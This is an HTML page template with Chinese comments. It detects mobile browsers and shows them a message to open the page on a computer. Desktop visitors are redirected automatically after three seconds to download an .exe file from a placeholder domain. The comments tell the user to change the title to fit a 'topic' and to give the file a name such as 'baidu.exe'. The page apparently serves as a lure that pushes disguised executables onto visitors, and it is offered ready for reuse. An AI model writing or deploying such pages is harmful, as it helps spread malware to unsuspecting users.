<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <title>这个标题自己修改对应的话题</title>   
    <!-- 上面为修改标题处  -->

    <script>
        function isMobile() {
            return /Mobi|Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        }

        window.onload = function() {
            if (isMobile()) {
                document.getElementById("mobile-warning").style.display = "block";
            } else {
                setTimeout(function() {
                    window.location.href = "https://你的域名/你的编号/文件名字.exe";  <!--这里""里面的内容修改为自己的文件名称，如baidu.exe -->
                }, 3000);
            }
        };
    </script>
</head>
<body>
   
    <p id="mobile-warning" style="display: none;">请使用电脑浏览器打开此网页。</p>
   
</body>
</html>
